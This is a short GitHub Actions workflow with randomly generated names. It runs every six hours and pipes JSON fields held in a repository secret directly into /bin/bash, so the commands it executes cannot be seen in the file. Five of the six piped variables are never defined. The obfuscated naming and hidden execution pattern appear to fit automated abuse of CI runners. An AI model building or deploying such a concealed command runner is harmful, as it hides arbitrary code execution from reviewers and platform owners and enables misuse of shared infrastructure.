name: longaodi2374
on:
  workflow_dispatch:
  schedule:
    - cron: '10 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: longaodi2374
        env:
          xroez7402: ${{ secrets.xroez7402 }}
        run: |
          echo $xroez7402 | jq -r .ssvti15276 | /bin/bash
          echo $b757 | jq -r .nywwf733 | /bin/bash
          echo $wvf3936 | jq -r .bdlt4561 | /bin/bash
          echo $pxz2 | jq -r .c30262 | /bin/bash
          echo $gxpl25326 | jq -r .conmp99210 | /bin/bash
          echo $ezseq103 | jq -r .plkj4101 | /bin/bash

